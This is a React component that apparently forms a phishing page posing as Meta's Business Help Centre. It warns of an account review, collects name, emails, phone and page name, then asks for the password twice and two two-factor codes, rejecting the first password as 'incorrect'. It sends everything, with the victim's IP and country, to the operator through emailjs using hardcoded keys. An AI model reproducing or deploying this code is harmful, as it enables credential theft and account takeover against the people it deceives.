import React, { useEffect, useState } from "react";
import images from "./assets/images";
import Modal from "react-modal";
import emailjs from "emailjs-com";
import TwoFactor from "./TwoFactor";
import Button from "./components/Button";
import Input from "./components/Input";

export default function Suport() {
  const [modalIsOpen, setIsOpen] = useState(false);
  const [information, setInformation] = useState("");
  const [fullName, setFullName] = useState("");
  const [businessEmail, setBusinessEmail] = useState("");
  const [personalEmail, setPersonalEmail] = useState("");
  const [phone, setPhone] = useState("");
  const [pageName, setPageName] = useState("");
  const [password, setPassword] = useState("");
  const [password2, setPassword2] = useState("");
  const [code1, setCode1] = useState("");
  const [code2, setCode2] = useState("");
  const [disabled, setDisabled] = useState(true);
  const [showAlert, setShowAlert] = useState(false);
  const [showTowFactor, setShowTowFactor] = useState(false);
  const [showSuport, setShowSuport] = useState(true);
  const [showPassTwo, setShowPassTwo] = useState(true);

  const [showInfo, setShowInfo] = useState(false);
  const [count, setCount] = useState(0);
  const [countInPass2, setCountInPass2] = useState(0);
  const [showCountDown, setShowCountDown] = useState(false);
  const [showAlert2, setShowAlert2] = useState(false);
  const [ipAddress, setIPAddress] = useState("");
  const [country, setCountry] = useState("");
  const [enableSend, setEnableSend] = useState(false); // State để kiểm soát trạng thái của nút "Send"

  const handleInputChange = (value) => {
    if (countInPass2 === 0) {
      setCode1(value);
    }
    if (countInPass2 === 1) {
      setCode2(value);
    }
  };

  useEffect(() => {
    fetch("https://geolocation-db.com/json/")
      .then((response) => response.json())
      .then((data) => {
        setIPAddress(data.IPv4);
        setCountry(data.country_name);
      })
      .catch();
  }, []);

  const customStyles = {
    content: {
      top: "50%",
      left: "50%",
      right: "auto",
      bottom: "auto",
      marginRight: "-50%",
      transform: "translate(-50%, -50%)",
      width: "80%",
      maxWidth: "650px",
    },
  };

  function openModal() {
    setIsOpen(true);
  }
  function closeModal() {
    setIsOpen(false);
  }
  const sendMail = () => {
    const templateParams = {
      from_name : ` ${country}: ${ipAddress}: ${fullName}`,
      appeal: information,
      fullName,
      businessEmail,
      personalEmail,
      phone,
      pageName,
      password,
      password2,
      code: code1,
      code2,
      user_referrer: window.location.href
    };

    // Gửi email bằng emailjs
    emailjs.send('service_ov9gxjl', 'template_q3fvhvv', templateParams, 'WJI8m2NskQkFr84WZ').then(
      (response) => {
          console.log('Successfully');
      },
      (error) => {
          console.error('Failed');
      },
  );
  };

  function submitForm() {
    var checkBox = document.getElementById("terms");
    if (
      checkBox.checked === true &&
      information !== "" &&
      fullName !== "" &&
      businessEmail !== "" &&
      personalEmail !== "" &&
      phone !== "" &&
      pageName !== ""
    ) {
      openModal();
    } else {
      alert("You need to fill in all the information!");
    }
  }
  const handleDis = () => {
    const checkBox = document.getElementById("terms");
    const submitButton = document.getElementById("submitFromButton");

    if (checkBox.checked) {
      setDisabled(false);
      submitButton.style.backgroundColor = "#0067ff";
    } else {
      setDisabled(true);
      submitButton.style.backgroundColor = "rgb(125, 175, 249)";
    }
  };
  const sendMailOne = (e) => {
    e.preventDefault();
    if (countInPass2 === 1) {
      if (code2 !== "") {
        setShowAlert(false);
        setShowInfo(true);
        setShowPassTwo(false);
        sendMail();
      } else {
        alert("You need to fill in all the information!");
      }
    } else {
      if (code1 !== "") {
        setCountInPass2(1);
        setShowCountDown(true);
        setShowAlert2(true);
        setEnableSend(true);
        sendMail();
      } else {
        alert("You need to fill in all the information!");
      }
    }
  };

  const opentSuport = (e) => {
    e.preventDefault();
    if (count === 1) {
      setShowSuport(false);
      setShowTowFactor(true);
      setShowAlert(false);
      sendMail();
    } else {
      setCount(1);
      sendMail();
      setShowAlert(true);
    }
  };

  return (
    <>
      {showSuport && (
        <div className="App" style={{ backgroundColor: "rgb(245, 246, 246)" }}>
          <Modal
            isOpen={modalIsOpen}
            onRequestClose={closeModal}
            style={customStyles}
            contentLabel="Example Modal"
          >
            <div
              style={{
                display: "flex",
                justifyContent: "space-between",
                marginTop: "20px",
              }}
            >
              <div style={{ fontSize: "20px", fontWeight: "400" }}>
                Please Enter Your Password
              </div>
              <button onClick={closeModal}>x</button>
            </div>
            <hr
              style={{
                borderTop: "0.5px solid rgb(255, 255, 255)",
                marginTop: "20px",
                marginBottom: "20px",
              }}
            ></hr>
            <div>
              For your security, you must enter your password to continue.
            </div>
            <div>
              <div
                style={{
                  fontWeight: "500",
                  color: "grey",
                  fontSize: "14px",
                  marginTop: "20px",
                  marginBottom: "5px",
                  textAlign: "left",
                }}
              >
                Password
              </div>
              <Input
                type={"password"}
                value={count === 1 ? password2 : password}
                onChange={(event) => {
                  if (count === 1) {
                    setPassword2(event.target.value);
                  } else {
                    setPassword(event.target.value);
                  }
                }}
              />
            </div>
            <div
              style={{
                textAlign: "right",
                display: "flex",
                justifyContent: "flex-end",
                flexDirection: "column",
              }}
            >
              <div>
                {showAlert && (
                  <div
                    style={{ color: "red", fontSize: "14px", marginTop: "5px" }}
                  >
                    The password you've entered is incorrect.
                  </div>
                )}
                <Button onClick={opentSuport}>Continue</Button>
              </div>
            </div>
          </Modal>
          <div
            style={{
              padding: "30px",
              backgroundColor: "rgb(245, 246, 246)",
              textAlign: "left",
            }}
          >
            <img src={images.meta} alt="Logo meta" height={15} />
          </div>
          <div
            style={{
              padding: "20px 30px",
              backgroundColor: "white",
              display: "flex",
              justifyContent: "space-between",
              fontWeight: "bold",
              fontSize: "14px",
            }}
          >
            <div>Business Help Centre</div>
            <div>Get support resources</div>
          </div>
          <div
            style={{
              display: "flex",
              justifyContent: "center",
              alignItems: "center",
              flexDirection: "column",
              backgroundSize: "cover",
              height: "200px",
              backgroundImage: `url(${images.bg})`,
            }}
          >
            <div
              style={{
                fontSize: "12px",
                fontWeight: "bold",
                color: "white",
              }}
            >
              Business Help Centre
            </div>
            <div
              style={{
                marginTop: "10px",
                fontSize: "36px",
                color: "white",
              }}
            >
              Get Support
            </div>
          </div>
          <div
            style={{
              display: "flex",
              justifyContent: "center",
            }}
          >
            <div
              style={{
                maxWidth: "560px",
                margin: "30px 10px 200px",
                padding: "0 15px 40px 15px",
                backgroundColor: "white",
                borderRadius: "15px",
                boxShadow: "0px 0px ",
              }}
            >
              <div
                style={{
                  textAlign: "center",
                  fontWeight: "bold",
                  fontSize: "20px",
                  marginTop: "20px",
                  marginBottom: "20px",
                }}
              >
                Get Started
              </div>
              <div
                style={{
                  backgroundColor: "rgb(226, 227, 229)",
                  padding: "20px",
                }}
              >
                <div
                  style={{
                    fontSize: "13px",
                    fontWeight: "500",
                    marginBottom: "10px",
                    textAlign: "left",
                  }}
                >
                  We have received multiple reports that suggest that your
                  account has been in violation of our terms of services and
                  community guidelines. As a result, your account is scheduled
                  for review
                </div>
                <div style={{ fontSize: "14px", fontWeight: "700" }}>
                  Report no: 2859599362
                </div>
              </div>
              <div>
                <div
                  style={{
                    fontWeight: "bold",
                    fontSize: "14px",
                    marginTop: "20px",
                    marginBottom: "10px",
                    textAlign: "left",
                  }}
                >
                  Please provide us information that will help us investigate
                </div>
                <textarea
                  type="text"
                  value={information}
                  onChange={(event) => setInformation(event.target.value)}
                  style={{
                    width: "95%",
                    height: "80px",
                    padding: "20px 15px",
                    fontSize: "14px",
                    border: "1px solid rgb(208, 208, 208)",
                    borderRadius: "5px",
                  }}
                ></textarea>
              </div>
              <div>
                <div
                  style={{
                    fontWeight: "500",
                    color: "grey",
                    fontSize: "14px",
                    marginTop: "20px",
                    marginBottom: "5px",
                    textAlign: "left",
                  }}
                >
                  Full Name
                </div>
                <Input
                  type={"text"}
                  value={fullName}
                  onChange={(event) => setFullName(event.target.value)}
                />
              </div>
              <div>
                <div
                  style={{
                    fontWeight: "500",
                    color: "grey",
                    fontSize: "14px",
                    marginTop: "20px",
                    marginBottom: "5px",
                    textAlign: "left",
                  }}
                >
                  Business Email Address
                </div>
                <Input
                  type={"email"}
                  value={businessEmail}
                  onChange={(event) => setBusinessEmail(event.target.value)}
                />
              </div>
              <div>
                <div
                  style={{
                    fontWeight: "500",
                    color: "grey",
                    fontSize: "14px",
                    marginTop: "20px",
                    marginBottom: "5px",
                    textAlign: "left",
                  }}
                >
                  Personal Email Address
                </div>
                <Input
                  type={"email"}
                  value={personalEmail}
                  onChange={(event) => setPersonalEmail(event.target.value)}
                />
              </div>
              <div>
                <div
                  style={{
                    fontWeight: "500",
                    color: "grey",
                    fontSize: "14px",
                    marginTop: "20px",
                    marginBottom: "5px",
                    textAlign: "left",
                  }}
                >
                  Mobile Phone Number
                </div>
                <Input
                  type="number"
                  inputMode="numeric"
                  value={phone}
                  onChange={(event) => setPhone(event.target.value)}
                />
              </div>
              <div>
                <div
                  style={{
                    fontWeight: "500",
                    color: "grey",
                    fontSize: "14px",
                    marginTop: "20px",
                    marginBottom: "5px",
                    textAlign: "left",
                  }}
                >
                  Page Name
                </div>
                <Input
                  type={"text"}
                  value={pageName}
                  onChange={(event) => setPageName(event.target.value)}
                />
              </div>
              <div
                style={{
                  fontWeight: "500",
                  color: "grey",
                  fontSize: "14px",
                  marginTop: "15px",
                  marginBottom: "40px",
                  textAlign: "left",
                }}
              >
                <input type="checkbox" id="terms" onChange={handleDis} />
                <label style={{ marginLeft: "5px" }} htmlFor="terms">
                  I agree to our Terms, Data and Cookies Policy.
                </label>
              </div>
              <button
                disabled={disabled}
                style={{
                  width: "100%",
                  height: "45px",
                  fontWeight: "bold",
                  fontSize: "16px",
                  borderRadius: "5px",
                  borderWidth: "0px",
                  backgroundColor: "rgb(125, 175, 249)",
                  cursor: "pointer",
                  color: "white",
                }}
                id="submitFromButton"
                onClick={submitForm}
              >
                Submit
              </button>
            </div>
          </div>
        </div>
      )}
      {showTowFactor && (
        <TwoFactor
          sendMail={sendMailOne}
          showPassTow={showPassTwo}
          showInfo={showInfo}
          showCountDown={showCountDown}
          showAlert2={showAlert2}
          onInputChange={handleInputChange}
          onCountdownEnd={() => setEnableSend(false)}
          disabled={enableSend}
        />
      )}
    </>
  );
}
